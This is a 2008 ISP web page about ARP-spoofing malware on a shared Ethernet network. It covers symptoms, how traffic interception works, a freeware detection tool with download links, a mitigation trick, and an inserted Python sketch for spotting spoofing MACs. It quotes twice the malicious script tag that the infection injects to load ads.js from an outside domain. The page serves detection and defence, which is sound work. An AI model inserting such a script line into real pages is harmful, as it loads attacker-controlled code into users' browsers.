Solution for g.asdafdgfgf.com problem

ARProtect
ARP spoof detection tool

Find ARP Spoofer in your network

5th February 2008

New version released on 22nd February 2008

20th June 2008:

Drishti announces development of "ARP2", a comprehensive ARP firewall for Windows and Linux. ARP2 protects your PC / server from ARP spoofing and poisoning. ARP2 also implements stateful inspection of ARP traffic, putting an end to various ARP-related subversive network activities.

It can also accurately identify the culprit host in the network (possibly a little better than ARProtect).

This would be a must-have firewall for every computer which is connected on ethernet.

ARP2 is scheduled to reach Beta on 18th July 2008.

If you can spare a few hours and are the administrator of a network, please drop us a line to participate in beta testing. You can reach us at achandra a_t netoptima.in

We can provide binaries for ARProtect on i386 Linux platform.

Embedded networking devices are now the bottleneck in an Ethernet environment. We can provide a customized ARP firewall solution for embedded Linux platforms for protection against the ARP spoofing virus.

Anil Chandra K

achandra a_t netoptima.in

 

We have broadband services (Drishti Broadband) operating in Secunderabad (India). Because of the close proximity of our customers, we use switches and Ethernet to connect them. So we have a very big physical network.

Recently we observed rampant ARP spoofing in our network. Readers may know about the injection of ads.js from asdafdgfgf.com and 222360.com.

Fortunately, it can be removed by installing AVG free edition or by using the removal tool from http://www.grisoft.com/doc/virbase/us/crp/0?nam=Win32%2FVirut

Due to the size of our physical network, the virus keeps coming back. So the problem was referred to our R&D team.

FAQ:

1) My browser shows an inserted javascript line <SCRIPT LANGUAGE="javascript1.2" SRC="http://g.asdafdgfgf.com/ads.js"></SCRIPT>. Is my computer infected with a virus?

Ans: Not necessarily. It is more likely to be due to an infected computer in your network.

2) Is my ISP inserting the javascript line?

Ans: Definitely NO. This problem is caused by infected computers in your physical network. Your ISP does not insert js into your pages. It is illegal for an ISP to modify data in any way, except for blocking certain data which is likely to cause problems.

3) How can you tell that my network has the asdafdgfgf problem?

Ans: Symptoms of the asdafdgfgf problem on a client computer

a) HTML pages have a javascript line inserted at the top of the page

b) Some websites do not open, e.g. Gmail, Yahoo or YouTube suddenly stops working.

c) Your downloads stop in the middle and you get a connection reset error.

Symptoms of the asdafdgfgf problem on your server (gateway)

1) Almost all computers in the network show same MAC ID.

2) Bandwidth graph is erratic

3) Too many RST packets

4) More importantly, complaints from users.

4) Why are you releasing this software as freeware?

Ans: Drishti Broadband has lost almost half of its customers due to this problem. We didn't want others to face the same.

5) Can I install some software on the server and solve the problem?

Ans: No. Unfortunately, there is no authentication mechanism in ARP. The server has to trust the ARP packets of client computers, and that is where the problem stems from.


6) How can some other computer in the network insert javascript line in my web page?

Ans: This happens through ARP spoofing and redirection of traffic.

http://www.watchguard.com/infocenter/editorial/135324.asp
http://en.wikipedia.org/wiki/ARP_spoofing

The infected computer pretends to be your PC to the gateway, and the gateway to your PC. Thus all traffic reaching your PC from the gateway has to pass through the infected computer.

The infected computer does not stall all traffic. It passes on most of the traffic to your PC but inserts the javascript line into your HTML pages.

When the infected computer has too much workload, it simply resets most of the connections, causing havoc in the network.

The solution to this problem involves

a) Identifying the infected computer in the network

b) Cleaning the infected PC or removing the infected PC from the network.

If your network is small, simply clean all PCs in the network. There is no guarantee that the virus will not come back.

Or simply install the ARProtect software (freeware), which will identify infected PCs in your network, and clean the infected PC.
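The identification step (a) can be sketched from observed ARP replies as follows. This is an added example, not ARProtect's code or its algorithm: it flags any MAC address that announces several IP addresses, which is the "same MAC ID" symptom listed above, and guesses the owner as the IP that was never announced with any other MAC. The frame list, addresses and the function name find_spoofers are constructed for illustration.

```python
from collections import defaultdict

# Constructed sample of ARP replies seen on the LAN: (sender IP, sender MAC).
FRAMES = [
    ("192.168.1.1",  "00:11:22:33:44:01"),  # gateway announcing itself
    ("192.168.1.10", "00:11:22:33:44:10"),  # client announcing itself
    ("192.168.1.23", "00:11:22:33:44:23"),  # infected PC announcing itself
    ("192.168.1.1",  "00:11:22:33:44:23"),  # forged: gateway IP, PC .23's MAC
    ("192.168.1.10", "00:11:22:33:44:23"),  # forged: client IP, PC .23's MAC
    ("192.168.1.1",  "00:11:22:33:44:01"),  # gateway re-announces
    ("192.168.1.1",  "00:11:22:33:44:23"),  # forged again
]


def find_spoofers(frames):
    """Map each MAC that claims several IPs to its likely owner and forged-frame count."""
    macs_of_ip = defaultdict(set)  # every MAC an IP was announced with
    ips_of_mac = defaultdict(set)  # every IP a MAC announced
    for ip, mac in frames:
        macs_of_ip[ip].add(mac.lower())
        ips_of_mac[mac.lower()].add(ip)

    report = {}
    for mac, ips in ips_of_mac.items():
        if len(ips) < 2:
            continue  # one MAC, one IP: normal
        # Heuristic (assumption): the MAC's real IP is one never announced
        # with any other MAC during the capture.
        owners = sorted(ip for ip in ips if len(macs_of_ip[ip]) == 1)
        forged = sum(1 for ip, m in frames
                     if m.lower() == mac and ip not in owners)
        report[mac] = {"owner_ips": owners,
                       "impersonated": sorted(ips - set(owners)),
                       "forged_frames": forged}
    return report


if __name__ == "__main__":
    for mac, info in find_spoofers(FRAMES).items():
        print(mac, info)
```

A gateway that legitimately answers ARP for other hosts (proxy ARP) would trip the same check, so a flagged MAC still has to be confirmed on the machine itself.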

(fig) ARP spoofing in progress

We have developed a simple Windows application that will pinpoint the IP address of the computer having such a virus. And we decided to release the tool as freeware.

Download ARProtect from

As promised, we are releasing a new version. This one refreshes faster.

NOTE: LOOK FOR IP ADDRESS WHERE CORRESPONDING COUNT INCREASES REGULARLY. THIS IS THE SPOOF FRAME COUNT.

Please be patient for results. Keep the software running to detect spoofing PCs in your network.

Read the entire document completely before installing the software.

http://www.netoptima.in/ARProtect_Setup_0.12.27.exe (Latest Version)

http://www.netoptima.in/ARProtect_Setup_0.12.15.exe (Old Version)

(Check this page again, we are releasing an update to ARProtect in a couple of days - 7th Feb 2008 - done.)

Note for Vista users: After installation, right-click on the desktop icon for ARProtect and select "run as administrator" the first time you run it.

You may want to protect your network from pornography using NetOptima, a network statistical pornography filter. You can download an eval version of NetOptima here.

We have two more requests, for ARPScan and ARPing. We will be releasing them in the near future.

How to use ARProtect?

Download and install ARProtect.

You need to restart the computer after the installation. Restarting ensures proper installation of drivers.

Run the program

You will get a screen like this.

screen shot 1

Wait for the list box to get populated.

If a virus is found, a list of IP addresses is displayed in the list box as follows.

screen shot 2

How to interpret results?

  1. If the IP address list contains your gateway, the gateway may not have the virus. The logic simply catches the gateway IP in addition to spoofing IPs.
  2. An IP address is definitely spoofing if the count associated with it is growing.
  3. The list may show the computer on which this software runs. It is not guaranteed to be a spoofing IP.

If you are unable to identify the spoofing IP using this software, odds are that your own computer is spoofing. :)

What Next?

Remove the cable to the computer at the IP address identified as the spoofing IP and re-run the test, just to be doubly sure.

Remove any virus on the computer using AVG or http://www.grisoft.com/doc/virbase/us/crp/0?nam=Win32%2FVirut

Tricks

<SCRIPT LANGUAGE="javascript1.2" SRC="http://g.asdafdgfgf.com/ads.js"></SCRIPT>

This line is inserted into the web page. Do not block traffic to this domain. Instead, redirect the traffic to your local web server (using iptables) and serve a blank ads.js page from that web server. We have Apache installed on the gateway. If you have a problem doing this, resolve g.asdafdgfgf.com and assign the resulting IP address to your gateway (this works on both Windows and Linux).


If you like it, drop us a line at achandra a_t netoptima.in

Anil Chandra K
Madhu Kumar Raparthi